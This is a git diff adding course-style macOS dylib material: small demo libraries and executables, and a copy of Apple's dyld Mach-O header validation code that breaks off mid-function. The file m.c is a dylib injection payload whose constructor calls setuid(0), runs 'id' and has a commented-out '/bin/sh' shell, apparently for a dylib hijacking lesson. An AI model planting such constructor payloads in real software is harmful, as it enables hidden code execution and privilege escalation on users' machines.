diff --git a/IV. Dylibs/custom/lib1.c b/IV. Dylibs/custom/lib1.c new file mode 100644 index 0000000..7ac07fc --- /dev/null +++ b/IV. Dylibs/custom/lib1.c @@ -0,0 +1,11 @@ +//clang -dynamiclib lib1.c -o $PWD/lib1.dylib -L. -l2 +#include +#include "lib1.h" +#include "lib2.h" + +void callLib1Function() { + printf("Now, wer are in lib1.dylib code.\n"); + printf("Press enter to enter lib2.dylib function\n"); + getchar(); + callLib2Function(); +} diff --git a/IV. Dylibs/custom/lib1.h b/IV. Dylibs/custom/lib1.h new file mode 100644 index 0000000..3b0c4e4 --- /dev/null +++ b/IV. Dylibs/custom/lib1.h @@ -0,0 +1,7 @@ +#ifndef LIB1_H +#define LIB1_H + +void callLib1Function(); + +#endif + diff --git a/IV. Dylibs/custom/lib2.c b/IV. Dylibs/custom/lib2.c new file mode 100644 index 0000000..f6c789e --- /dev/null +++ b/IV. Dylibs/custom/lib2.c @@ -0,0 +1,10 @@ +//clang -dynamiclib lib2.c -o $PWD/lib2.dylib +#include +#include +#include + +void callLib2Function() { + printf("Now we are in lib2.dylib.\n"); + printf("Press enter to back to executable code...\n"); + getchar(); +} diff --git a/IV. Dylibs/custom/lib2.h b/IV. Dylibs/custom/lib2.h new file mode 100644 index 0000000..b9a6765 --- /dev/null +++ b/IV. Dylibs/custom/lib2.h @@ -0,0 +1,7 @@ +#ifndef LIB2_H +#define LIB2_H + +void callLib2Function(); + +#endif + diff --git a/IV. Dylibs/custom/m.c b/IV. Dylibs/custom/m.c new file mode 100644 index 0000000..8c5e61c --- /dev/null +++ b/IV. Dylibs/custom/m.c @@ -0,0 +1,17 @@ +// clang -dynamiclib m.c -o m.dylib //-o $PWD/TARGET_DYLIB +#include +#include +#include +#include + +__attribute__((constructor)) +void myconstructor(int argc, const char **argv) +{ + syslog(LOG_ERR, "[+] m.dylib injected in %s\n", argv[0]); + printf("[+] m.dylib injected in %s\n", argv[0]); + setuid(0); + system("id"); + //system("/bin/sh"); +} + +void callLib1Function(void){} \ No newline at end of file diff --git a/IV. Dylibs/custom/main.c b/IV. Dylibs/custom/main.c new file mode 100644 index 0000000..58c4fc7 --- /dev/null +++ b/IV. Dylibs/custom/main.c @@ -0,0 +1,15 @@ +//clang main.c -o $PWD/executable -L. -l1 +//codesign -s IDENTITY --option=runtime -f executable +#include +#include "lib1.h" + +int main() { + printf("Main program\n"); + printf("Press enter to call lib1.dylib function...\n"); + getchar(); + callLib1Function(); + printf("Press Enter to exit...\n"); + getchar(); + return 0; +} + diff --git a/IV. Dylibs/custom/mylib.c b/IV. Dylibs/custom/mylib.c new file mode 100644 index 0000000..1754147 --- /dev/null +++ b/IV. Dylibs/custom/mylib.c @@ -0,0 +1,6 @@ +#include "mylib.h" +#include + +void myFunction() { + printf("Hello from mylib!\n"); +} \ No newline at end of file diff --git a/IV. Dylibs/custom/mylib.h b/IV. Dylibs/custom/mylib.h new file mode 100644 index 0000000..533de96 --- /dev/null +++ b/IV. Dylibs/custom/mylib.h @@ -0,0 +1 @@ +void my_function(); // Declare the function prototype \ No newline at end of file diff --git a/IV. Dylibs/custom/use_mylib.c b/IV. Dylibs/custom/use_mylib.c new file mode 100644 index 0000000..3ee6ad6 --- /dev/null +++ b/IV. Dylibs/custom/use_mylib.c @@ -0,0 +1,6 @@ +#include "mylib.h" + +int main() { + myFunction(); // Call the function from the library + return 0; +} \ No newline at end of file diff --git a/IV. Dylibs/macos/Header.cpp b/IV. Dylibs/macos/Header.cpp new file mode 100644 index 0000000..59e8903 --- /dev/null +++ b/IV. Dylibs/macos/Header.cpp @@ -0,0 +1,2537 @@ +// Source: https://github.com/apple-oss-distributions/dyld/blob/rel/dyld-1122/mach_o/Header.cpp +/* + * Copyright (c) 2021 Apple Inc. All rights reserved. + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include + +#include +#include +#include +#include + +#include +#if !TARGET_OS_EXCLAVEKIT + #include +#endif + +#include "Array.h" +#include "Header.h" +#include "Architecture.h" +#include "Misc.h" +#include "Policy.h" +#include "LoggingStub.h" + +using mach_o::Architecture; +using mach_o::Platform; +using mach_o::PlatformAndVersions; +using mach_o::Policy; + +namespace mach_o { + +// +// MARK: --- methods that read mach_header --- +// + +bool Header::hasMachOMagic() const +{ + return ((mh.magic == MH_MAGIC) || (mh.magic == MH_MAGIC_64)); +} + +bool Header::hasMachOBigEndianMagic() const +{ + return ((mh.magic == MH_CIGAM) || (mh.magic == MH_CIGAM_64)); +} + +bool Header::is64() const +{ + return (mh.magic == MH_MAGIC_64); +} + +uint32_t Header::machHeaderSize() const +{ + return is64() ? sizeof(mach_header_64) : sizeof(mach_header); +} + +uint32_t Header::pointerSize() const +{ + if ( mh.magic == MH_MAGIC_64 ) + return 8; + else + return 4; +} + +bool Header::uses16KPages() const +{ + switch ( mh.cputype ) { + case CPU_TYPE_ARM64: + case CPU_TYPE_ARM64_32: + return true; + case CPU_TYPE_ARM: + // iOS is 16k aligned for armv7/armv7s and watchOS armv7k is 16k aligned + return mh.cpusubtype == CPU_SUBTYPE_ARM_V7K; + default: + return false; + } +} + +bool Header::isArch(const char* aName) const +{ + return (strcmp(aName, this->archName()) == 0); +} + +const char* Header::archName() const +{ + return Architecture(&mh).name(); +} + +Architecture Header::arch() const +{ + return Architecture(&mh); +} + +bool Header::inDyldCache() const +{ + return (mh.flags & MH_DYLIB_IN_CACHE); +} + +bool Header::isDyldManaged() const +{ + switch ( mh.filetype ) { + case MH_BUNDLE: + case MH_EXECUTE: + case MH_DYLIB: + return ((mh.flags & MH_DYLDLINK) != 0); + default: + break; + } + return false; +} + +bool Header::isDylib() const +{ + return (mh.filetype == MH_DYLIB); +} + +bool Header::isBundle() const +{ + return (mh.filetype == MH_BUNDLE); +} + +bool Header::isMainExecutable() const +{ + return (mh.filetype == MH_EXECUTE); +} + +bool Header::isDynamicExecutable() const +{ + if ( mh.filetype != MH_EXECUTE ) + return false; + + // static executables do not have dyld load command + return hasLoadCommand(LC_LOAD_DYLINKER); +} + +bool Header::isKextBundle() const +{ + return (mh.filetype == MH_KEXT_BUNDLE); +} + +bool Header::isObjectFile() const +{ + return (mh.filetype == MH_OBJECT); +} + +bool Header::isFileSet() const +{ + return (mh.filetype == MH_FILESET); +} + +bool Header::isPIE() const +{ + return (mh.flags & MH_PIE); +} + +bool Header::isPreload() const +{ + return (mh.filetype == MH_PRELOAD); +} + +bool Header::hasWeakDefs() const +{ + return (mh.flags & MH_WEAK_DEFINES); +} + +bool Header::usesWeakDefs() const +{ + return (mh.flags & MH_BINDS_TO_WEAK); +} + +bool Header::hasThreadLocalVariables() const +{ + return (mh.flags & MH_HAS_TLV_DESCRIPTORS); +} + +const Header* Header::isMachO(std::span content) +{ + if ( content.size() < sizeof(mach_header) ) + return nullptr; + + const Header* mh = (const Header*)content.data(); + if ( mh->hasMachOMagic() ) + return mh; + return nullptr; +} + +bool Header::mayHaveTextFixups() const +{ + // only i386 binaries support text fixups + if ( mh.cputype == CPU_TYPE_I386 ) + return true; + // and x86_64 kext bundles + if ( isKextBundle() && (mh.cputype == CPU_TYPE_X86_64) ) + return true; + return false; +} + +bool Header::hasSubsectionsViaSymbols() const +{ + return (this->mh.flags & MH_SUBSECTIONS_VIA_SYMBOLS) != 0; +} + +bool Header::noReexportedDylibs() const +{ + return (this->mh.flags & MH_NO_REEXPORTED_DYLIBS) != 0; +} + +bool Header::isAppExtensionSafe() const +{ + return (this->mh.flags & MH_APP_EXTENSION_SAFE) != 0; +} + +bool Header::isSimSupport() const +{ + return (this->mh.flags & MH_SIM_SUPPORT) != 0; +} + + +// +// MARK: --- methods for validating mach-o content --- +// + +PlatformAndVersions Header::platformAndVersions() const +{ + // should be one platform load command (exception is zippered dylibs) + __block PlatformAndVersions pvs; + forEachPlatformLoadCommand(^(Platform platform, Version32 minOS, Version32 sdk) { + Error err = pvs.zip({ platform, minOS, sdk }); + assert(err.noError()); + }); + return pvs; +} + +Error Header::validSemanticsPlatform() const +{ + // should be one platform load command (exception is zippered dylibs) + __block PlatformAndVersions pvs; + __block Error badPlatform; + forEachPlatformLoadCommand(^(Platform platform, Version32 minOS, Version32 sdk) { + if ( badPlatform.hasError() ) return; + + if ( Error err = platform.valid() ) { + badPlatform = std::move(err); + return; + } + badPlatform = pvs.zip({ platform, minOS, sdk }); + }); + if ( badPlatform ) + return std::move(badPlatform); + +#if BUILDING_MACHO_WRITER + if ( pvs.platform.empty() ) + return Error::none(); // allow empty platform in static linker +#endif + + return pvs.platform.valid(); +} + +Error Header::valid(uint64_t fileSize) const +{ + if ( fileSize < sizeof(mach_header) ) + return Error("file is too short"); + + if ( !hasMachOMagic() ) + return Error("not a mach-o file (start is no MH_MAGIC[_64])"); + + if ( Error err = validStructureLoadCommands(fileSize) ) + return err; + + if ( Error err = validSemanticsPlatform() ) + return err; + + // create policy object + Policy policy(arch(), platformAndVersions(), mh.filetype, false); + + if ( Error err = validSemanticsUUID(policy) ) + return err; + + if ( Error err = validSemanticsInstallName(policy) ) + return err; + + if ( Error err = validSemanticsDependents(policy) ) + return err; + + if ( Error err = validSemanticsRPath(policy) ) + return err; + + if ( Error err = validSemanticsSegments(policy, fileSize) ) + return err; + + if ( Error err = validSemanticsLinkerOptions(policy) ) + return err; + + if ( isMainExecutable() ) { + if ( Error err = validSemanticsMain(policy) ) + return err; + } + + return Error::none(); +} + +static Error stringOverflow(const load_command* cmd, uint32_t index, uint32_t strOffset) +{ + if ( strOffset >= cmd->cmdsize ) + return Error("load command #%d string offset (%u) outside its size (%u)", index, strOffset, cmd->cmdsize); + + const char* str = (char*)cmd + strOffset; + const char* end = (char*)cmd + cmd->cmdsize; + for ( const char* s = str; s < end; ++s ) { + if ( *s == '\0' ) { + return Error::none(); + } + } + return Error("load command #%d string extends beyond end of load command", index); +} + +Error Header::validStructureLoadCommands(uint64_t fileSize) const +{ + // check load command don't exceed file length + const uint64_t headerAndLCSize = mh.sizeofcmds + machHeaderSize(); + if ( headerAndLCSize > fileSize ) { + return Error("load commands length (%llu) exceeds length of file (%llu)", headerAndLCSize, fileSize); + } + + // check for reconized filetype + switch ( mh.filetype ) { + case MH_EXECUTE: + case MH_DYLIB: + case MH_DYLINKER: + case MH_BUNDLE: + case MH_KEXT_BUNDLE: + case MH_FILESET: + case MH_PRELOAD: + case MH_OBJECT: + break; + default: + return Error("unknown filetype %d", mh.filetype); + } + + // walk all load commands and sanity check them + __block int index = 1; + __block Error lcError; + auto lcChecker = ^(const load_command* cmd, bool& stop) { + const dylib_command* dylibCmd; + const rpath_command* rpathCmd; + const sub_umbrella_command* umbrellaCmd; + const sub_client_command* clientCmd; + const sub_library_command* libraryCmd; + const build_version_command* buildVersCmd; + const segment_command* segCmd; + const segment_command_64* seg64Cmd; + const fileset_entry_command* fileSetCmd; + switch ( cmd->cmd ) { + case LC_ID_DYLIB: + case LC_LOAD_DYLIB: + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: + dylibCmd = (dylib_command*)cmd; + lcError = stringOverflow(cmd, index, dylibCmd->dylib.name.offset); + break; + case LC_RPATH: + rpathCmd = (rpath_command*)cmd; + lcError = stringOverflow(cmd, index, rpathCmd->path.offset); + break; + case LC_SUB_UMBRELLA: + umbrellaCmd = (sub_umbrella_command*)cmd; + lcError = stringOverflow(cmd, index, umbrellaCmd->sub_umbrella.offset); + break; + case LC_SUB_CLIENT: + clientCmd = (sub_client_command*)cmd; + lcError = stringOverflow(cmd, index, clientCmd->client.offset); + break; + case LC_SUB_LIBRARY: + libraryCmd = (sub_library_command*)cmd; + lcError = stringOverflow(cmd, index, libraryCmd->sub_library.offset); + break; + case LC_SYMTAB: + if ( cmd->cmdsize != sizeof(symtab_command) ) + lcError = Error("load command #%d LC_SYMTAB size wrong", index); + break; + case LC_DYSYMTAB: + if ( cmd->cmdsize != sizeof(dysymtab_command) ) + lcError = Error("load command #%d LC_DYSYMTAB size wrong", index); + break; + case LC_SEGMENT_SPLIT_INFO: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_SEGMENT_SPLIT_INFO size wrong", index); + break; + case LC_ATOM_INFO: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_ATOM_INFO size wrong", index); + break; + case LC_FUNCTION_STARTS: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_FUNCTION_STARTS size wrong", index); + break; + case LC_DYLD_EXPORTS_TRIE: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_DYLD_EXPORTS_TRIE size wrong", index); + break; + case LC_DYLD_CHAINED_FIXUPS: + if ( cmd->cmdsize != sizeof(linkedit_data_command) ) + lcError = Error("load command #%d LC_DYLD_CHAINED_FIXUPS size wrong", index); + break; + case LC_ENCRYPTION_INFO: + if ( cmd->cmdsize != sizeof(encryption_info_command) ) + lcError = Error("load command #%d LC_ENCRYPTION_INFO size wrong", index); + break; + case LC_ENCRYPTION_INFO_64: + if ( cmd->cmdsize != sizeof(encryption_info_command_64) ) + lcError = Error("load command #%d LC_ENCRYPTION_INFO_64 size wrong", index); + break; + case LC_DYLD_INFO: + case LC_DYLD_INFO_ONLY: + if ( cmd->cmdsize != sizeof(dyld_info_command) ) + lcError = Error("load command #%d LC_DYLD_INFO_ONLY size wrong", index); + break; + case LC_VERSION_MIN_MACOSX: + case LC_VERSION_MIN_IPHONEOS: + case LC_VERSION_MIN_TVOS: + case LC_VERSION_MIN_WATCHOS: + if ( cmd->cmdsize != sizeof(version_min_command) ) + lcError = Error("load command #%d LC_VERSION_MIN_* size wrong", index); + break; + case LC_UUID: + if ( cmd->cmdsize != sizeof(uuid_command) ) + lcError = Error("load command #%d LC_UUID size wrong", index); + break; + case LC_BUILD_VERSION: + buildVersCmd = (build_version_command*)cmd; + if ( cmd->cmdsize != (sizeof(build_version_command) + buildVersCmd->ntools * sizeof(build_tool_version)) ) + lcError = Error("load command #%d LC_BUILD_VERSION size wrong", index); + break; + case LC_MAIN: + if ( cmd->cmdsize != sizeof(entry_point_command) ) + lcError = Error("load command #%d LC_MAIN size wrong", index); + break; + case LC_SEGMENT: + segCmd = (segment_command*)cmd; + if ( cmd->cmdsize != (sizeof(segment_command) + segCmd->nsects * sizeof(section)) ) + lcError = Error("load command #%d LC_SEGMENT size does not match number of sections", index); + break; + case LC_SEGMENT_64: + seg64Cmd = (segment_command_64*)cmd; + if ( cmd->cmdsize != (sizeof(segment_command_64) + seg64Cmd->nsects * sizeof(section_64)) ) + lcError = Error("load command #%d LC_SEGMENT_64 size does not match number of sections", index); + break; + case LC_FILESET_ENTRY: + fileSetCmd = (fileset_entry_command*)cmd; + lcError = stringOverflow(cmd, index, fileSetCmd->entry_id.offset); + break; + default: + if ( cmd->cmd & LC_REQ_DYLD ) + lcError = Error("load command #%d unknown required load command 0x%08X", index, cmd->cmd); + break; + } + ++index; + if ( lcError ) + stop = true; + }; + if ( Error err = this->forEachLoadCommand(lcChecker) ) + return err; + if ( lcError ) + return std::move(lcError); + /* + // check load commands fit in TEXT segment + if ( this->isDyldManaged() ) { + __block bool foundTEXT = false; + __block Error segError; + forEachSegment(^(const SegmentInfo& segInfo, bool& stop) { + if ( strcmp(segInfo.segName, "__TEXT") == 0 ) { + foundTEXT = true; + if ( headerAndLCSize > segInfo.fileSize ) { + segError = Error("load commands (%llu) exceed length of __TEXT segment (%llu)", headerAndLCSize, segInfo.fileSize); + } + if ( segInfo.fileOffset != 0 ) { + segError = Error("__TEXT segment not start of mach-o (%llu)", segInfo.fileOffset); + } + stop = true; + } + }); + if ( segError ) + return std::move(segError); + if ( !foundTEXT ) { + return Error("missing __TEXT segment"); + } + } +*/ + return Error::none(); +} + + +Error Header::validSemanticsUUID(const Policy& policy) const +{ + // should have at most one LC_UUID + __block unsigned uuidCount = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_UUID ) + ++uuidCount; + }); + if ( uuidCount > 1 ) + return Error("too many LC_UUID load commands"); + if ( (uuidCount == 0) && policy.enforceHasUUID() ) + return Error("missing LC_UUID load command"); + + return Error::none(); +} + +Error Header::validSemanticsInstallName(const Policy& policy) const +{ + __block const char* installName = nullptr; + __block int foundCount = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_ID_DYLIB ) { + const dylib_command* dylibCmd = (dylib_command*)cmd; + installName = (char*)dylibCmd + dylibCmd->dylib.name.offset; + ++foundCount; + } + }); + if ( foundCount > 1 ) + return Error("multiple LC_ID_DYLIB found"); + + if ( this->isDylib() ) { + if ( installName == nullptr ) + return Error("MH_DYLIB is missing LC_ID_DYLIB"); +#if 0 // FIXME: need path plumbed down + if ( policy.enforceInstallNamesAreRealPaths() ) { + // new binary, so check that part after @xpath/ is real (not symlinks) + if ( (strncmp(installName, "@loader_path/", 13) == 0) || (strncmp(installName, "@executable_path/", 17) == 0) ) { + if ( const char* s = strchr(installName, '/') ) { + while (strncmp(s, "/..", 3) == 0) + s += 3; + const char* trailingInstallPath = s; + const char* trailingRealPath = &path[strlen(path)-strlen(trailingInstallPath)]; + if ( strcmp(trailingRealPath, trailingInstallPath) != 0 ) { + Error("install name '%s' contains symlinks", installName); + } + } + } + } +#endif + } + else { + if ( installName != nullptr ) + return Error("found LC_ID_DYLIB found in non-MH_DYLIB"); + } + + return Error::none(); +} + +Error Header::validSemanticsDependents(const Policy& policy) const +{ + // gather info + __block Error dupDepError; + __block int depCount = 0; + const char* depPathsBuffer[256]; + const char** depPaths = depPathsBuffer; + const bool enforceNoDupDylibs = policy.enforceNoDuplicateDylibs(); + const bool hasWarningHandler = mach_o::hasWarningHandler(); + // don't use forEachDependentDylib, because it synthesizes libSystem.dylib + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_LOAD_DYLIB: + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: { + const dylib_command* dylibCmd = (dylib_command*)cmd; + const char* loadPath = (char*)dylibCmd + dylibCmd->dylib.name.offset; + if ( (depCount < 256) && ( enforceNoDupDylibs || hasWarningHandler ) ) { + for ( int i = 0; i < depCount; ++i ) { + if ( strcmp(loadPath, depPaths[i]) == 0 ) { + if ( enforceNoDupDylibs ) { + dupDepError = Error("duplicate dependent dylib '%s'", loadPath); + stop = true; + } else + warning(this, "duplicate dependent dylib are deprecated ('%s')", loadPath); + } + } + depPaths[depCount] = loadPath; + } + ++depCount; + } break; + } + }); + if ( dupDepError ) + return std::move(dupDepError); + + // all new binaries must link with something + if ( this->isDyldManaged() && policy.enforceHasLinkedDylibs() && (depCount == 0) ) { + // except for dylibs in libSystem.dylib which are ok to link with nothing (they are on bottom) + const char* libSystemDir = this->builtForPlatform(Platform::driverKit, true) ? "/System/DriverKit/usr/lib/system/" : "/usr/lib/system/"; + const char* installName = this->installName(); + bool isNotLibSystem = (installName == nullptr) || (strncmp(installName, libSystemDir, strlen(libSystemDir)) != 0); + if ( isNotLibSystem ) + return Error("missing LC_LOAD_DYLIB (must link with at least libSystem.dylib)"); + } + return Error::none(); +} + +Error Header::validSemanticsRPath(const Policy& policy) const +{ + const bool enforceNoDupRPath = policy.enforceNoDuplicateRPaths(); + if ( !enforceNoDupRPath && !hasWarningHandler() ) + return Error::none(); + + __block Error dupRPathError; + __block int rpathCount = 0; + const char* rpathsBuffer[64]; + const char** rpaths = rpathsBuffer; + forEachRPath(^(const char* rPath, bool& stop) { + if ( rpathCount < 64 ) { + for ( int i = 0; i < rpathCount; ++i ) { + if ( strcmp(rPath, rpaths[i]) == 0 ) { + if ( enforceNoDupRPath ) { + dupRPathError = Error("duplicate LC_RPATH '%s'", rPath); + stop = true; + } else + warning(this, "duplicate LC_RPATH are deprecated ('%s')", rPath); + } + } + rpaths[rpathCount] = rPath; + } + ++rpathCount; + }); + return std::move(dupRPathError); +} + +#if !TARGET_OS_EXCLAVEKIT +template +Error Header::validSegment(const Policy& policy, uint64_t wholeFileSize, const SG* seg) const +{ + if ( greaterThanAddOrOverflow(seg->fileoff, seg->filesize, wholeFileSize) ) + return Error("segment '%s' load command content extends beyond end of file", seg->segname); + + // dyld should support non-allocatable __LLVM segment + if ( !isObjectFile() ) { + if ( (seg->filesize > seg->vmsize) && ((seg->vmsize != 0) || ((seg->flags & SG_NORELOC) == 0)) ) + return Error("segment '%s' filesize exceeds vmsize", seg->segname); + } + + // check permission bits + if ( (seg->initprot & 0xFFFFFFF8) != 0 ) { + return Error("%s segment permissions has invalid bits set (0x%08X)", seg->segname, seg->initprot); + } + if ( policy.enforceTextSegmentPermissions() ) { + if ( (strcmp(seg->segname, "__TEXT") == 0) && (seg->initprot != (VM_PROT_READ | VM_PROT_EXECUTE)) ) + return Error("__TEXT segment permissions is not 'r-x'"); + } + if ( policy.enforceReadOnlyLinkedit() ) { + if ( (strcmp(seg->segname, "__LINKEDIT") == 0) && (seg->initprot != VM_PROT_READ) ) + return Error("__LINKEDIT segment permissions is not 'r--'"); + } + if ( policy.enforceDataSegmentPermissions() ) { + if ( (strcmp(seg->segname, "__DATA") == 0) && (seg->initprot != (VM_PROT_READ | VM_PROT_WRITE)) ) + return Error("__DATA segment permissions is not 'rw-'"); + if ( strcmp(seg->segname, "__DATA_CONST") == 0 ) { + if ( seg->initprot != (VM_PROT_READ | VM_PROT_WRITE) ) + return Error("__DATA_CONST segment permissions is not 'rw-'"); + if ( (seg->flags & SG_READ_ONLY) == 0 ) { + if ( this->isDylib() && this->hasSplitSegInfo() ) { + // dylibs in dyld cache are allowed to not have SG_READ_ONLY set + } + else { + return Error("__DATA_CONST segment missing SG_READ_ONLY flag"); + } + } + } + } + + // check for vmaddr wrapping + if ( (seg->vmaddr + seg->vmsize) < seg->vmaddr ) + return Error("'%s' segment vm range wraps", seg->segname); + + // check sections are within its segment + const SC* const sectionsStart = (SC*)((char*)seg + sizeof(SG)); + const SC* const sectionsEnd = §ionsStart[seg->nsects]; + for ( const SC* sect = sectionsStart; (sect < sectionsEnd); ++sect ) { + if ( (int64_t)(sect->size) < 0 ) { + return Error("section '%s' size too large 0x%lX", sect->sectname, (size_t)sect->size); + } + else if ( sect->addr < seg->vmaddr ) { + return Error("section '%s' start address 0x%lX is before containing segment's address 0x%0lX", sect->sectname, (size_t)sect->addr, (size_t)seg->vmaddr); + } + else if ( policy.enforceSectionsInSegment() && (sect->addr + sect->size > seg->vmaddr + seg->vmsize) ) { + return Error("section '%s' end address 0x%lX is beyond containing segment's end address 0x%0lX", sect->sectname, (size_t)(sect->addr + sect->size), (size_t)(seg->vmaddr + seg->vmsize)); + } + } + + return Error::none(); +} + +#endif // !TARGET_OS_EXCLAVEKIT +struct Interval +{ + bool overlaps(const Interval& other) const; + uint64_t start; + uint64_t end; +}; + +bool Interval::overlaps(const Interval& other) const +{ + return ((other.start < this->end) && (other.end > this->start)); +} + +Error Header::validSemanticsSegments(const Policy& policy, uint64_t fileSize) const +{ + // check each segment load command in isolation + struct SegRange + { + Interval vm; + Interval file; + const char* name; + }; + STACK_ALLOC_OVERFLOW_SAFE_ARRAY(SegRange, ranges, 12); + __block Error lcError; + __block bool hasTEXT = false; + __block bool hasLINKEDIT = false; + __block uintptr_t segmentIndexText = 0; + __block uintptr_t segmentIndexLinkedit = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* seg64 = (segment_command_64*)cmd; + if ( strcmp(seg64->segname, "__TEXT") == 0 ) { + hasTEXT = true; + segmentIndexText = ranges.count(); + } + else if ( strcmp(seg64->segname, "__LINKEDIT") == 0 ) { + hasLINKEDIT = true; + segmentIndexLinkedit = ranges.count(); + } + lcError = validSegment(policy, fileSize, seg64); + ranges.push_back({ { seg64->vmaddr, seg64->vmaddr + seg64->vmsize }, { seg64->fileoff, seg64->fileoff + seg64->filesize }, seg64->segname }); + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* seg32 = (segment_command*)cmd; + if ( strcmp(seg32->segname, "__TEXT") == 0 ) { + hasTEXT = true; + segmentIndexText = ranges.count(); + } + else if ( strcmp(seg32->segname, "__LINKEDIT") == 0 ) { + hasLINKEDIT = true; + segmentIndexLinkedit = ranges.count(); + } + lcError = validSegment(policy, fileSize, seg32); + ranges.push_back({ { seg32->vmaddr, seg32->vmaddr + seg32->vmsize }, { seg32->fileoff, seg32->fileoff + seg32->filesize }, seg32->segname }); + } + if ( lcError ) + stop = true; + }); + if ( lcError ) + return std::move(lcError); + + // dynamic binaries have further restrictions + if ( isDyldManaged() ) { + if ( hasTEXT ) { + if ( ranges[segmentIndexText].file.start != 0 ) + return Error("__TEXT segment fileoffset is not zero"); + const uint32_t headerAndLCSize = machHeaderSize() + mh.sizeofcmds; + if ( ranges[segmentIndexText].file.end < headerAndLCSize ) + return Error("load commands do not fit in __TEXT segment"); + } + else { + return Error("missing __TEXT segment"); + } + // FIXME: LINKEDIT checks need to move to Analyzer + //if ( !hasLINKEDIT ) + // return Error("missing __LINKEDIT segment"); + } + + // check for overlapping segments, by looking at every possible pair of segments + for ( const SegRange& r1 : ranges ) { + for ( const SegRange& r2 : ranges ) { + if ( &r1 == &r2 ) + continue; + if ( r1.vm.overlaps(r2.vm) ) + return Error("vm range of segment '%s' overlaps segment '%s'", r1.name, r2.name); + if ( r1.file.overlaps(r2.file) ) + return Error("file range of segment '%s' overlaps segment '%s'", r1.name, r2.name); + } + } + + // check segment load command order matches file content order which matches vm order + // skip dyld cache because segments are moved around too much + if ( policy.enforceSegmentOrderMatchesLoadCmds() && !inDyldCache() ) { + const SegRange* last = nullptr; + for ( const SegRange& r : ranges ) { + if ( last != nullptr ) { + if ( (r.file.start < last->file.start) && (r.file.start != r.file.end) ) + return Error("segment '%s' file offset out of order", r.name); + if ( r.vm.start < last->vm.start ) { + if ( isFileSet() && (strcmp(r.name, "__PRELINK_INFO") == 0) ) { + // __PRELINK_INFO may have no vmaddr set + } + else { + return Error("segment '%s' vm address out of order", r.name); + } + } + } + last = &r; + } + } + + return Error::none(); +} + +Error Header::validSemanticsMain(const Policy& policy) const +{ + if ( this->inDyldCache() && policy.enforceMainFlagsCorrect() ) + return Error("MH_EXECUTE has MH_DYLIB_IN_CACHE bit set"); + + // validate the correct number of LC_MAIN or LC_UNIXTHREAD + __block Error lcError; + __block uint64_t startAddress = 0; + __block const entry_point_command* mainCmd = nullptr; + __block const thread_command* threadCmd = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_MAIN: + if ( mainCmd != nullptr ) + lcError = Error("multiple LC_MAIN load commands"); + mainCmd = (entry_point_command*)cmd; + break; + case LC_UNIXTHREAD: + if ( threadCmd != nullptr ) + lcError = Error("multiple LC_UNIXTHREAD load commands"); + threadCmd = (thread_command*)cmd; + if ( !entryAddrFromThreadCmd(threadCmd, startAddress) ) + lcError = Error("invalid LC_UNIXTHREAD"); + break; + } + }); + if ( lcError ) + return std::move(lcError); + if ( (mainCmd != nullptr) && (threadCmd != nullptr) ) + return Error("can't have LC_MAIN and LC_UNIXTHREAD load commands"); + if ( this->builtForPlatform(Platform::driverKit) ) { + if ( (mainCmd != nullptr) || (threadCmd != nullptr) ) + return Error("LC_MAIN not allowed for driverkit"); + } + else { + if ( (mainCmd == nullptr) && (threadCmd == nullptr) ) + return Error("missing LC_MAIN or LC_UNIXTHREAD in main executable"); + } + + // FIXME: validate LC_MAIN or LC_UNIXTHREAD points into executable segment + return Error::none(); +} + +Error Header::validSemanticsLinkerOptions(const Policy& policy) const +{ + __block Error lcError; + + forEachLoadCommandSafe(^(const load_command *cmd, bool &stop) { + if ( cmd->cmd == LC_LINKER_OPTION ) { + const char* begin = (char*)cmd + sizeof(linker_option_command); + const char* end = (char*)cmd + cmd->cmdsize; + const uint32_t count = ((linker_option_command*)cmd)->count; + for ( uint32_t i = 0; i < count; ++i ) { + const char* next = begin + strlen(begin) + 1; + if ( next > end ) { + lcError = Error("malformed LC_LINKER_OPTION command"); + stop = true; + return; + } + begin = next; + } + } + }); + + return std::move(lcError); +} + +Error Header::forEachLoadCommand(void (^callback)(const load_command* cmd, bool& stop)) const +{ + bool stop = false; + const load_command* startCmds = nullptr; + if ( mh.magic == MH_MAGIC_64 ) + startCmds = (load_command*)((char*)this + sizeof(mach_header_64)); + else if ( mh.magic == MH_MAGIC ) + startCmds = (load_command*)((char*)this + sizeof(mach_header)); + else if ( hasMachOBigEndianMagic() ) + return Error("big endian mach-o file"); + else { + const uint32_t* h = (uint32_t*)this; + return Error("file does not start with MH_MAGIC[_64]: 0x%08X 0x%08X", h[0], h[1]); + } + if ( mh.filetype > 12 ) + return Error("unknown mach-o filetype (%u)", mh.filetype); + // const uint32_t ptrSize = this->pointerSize(); 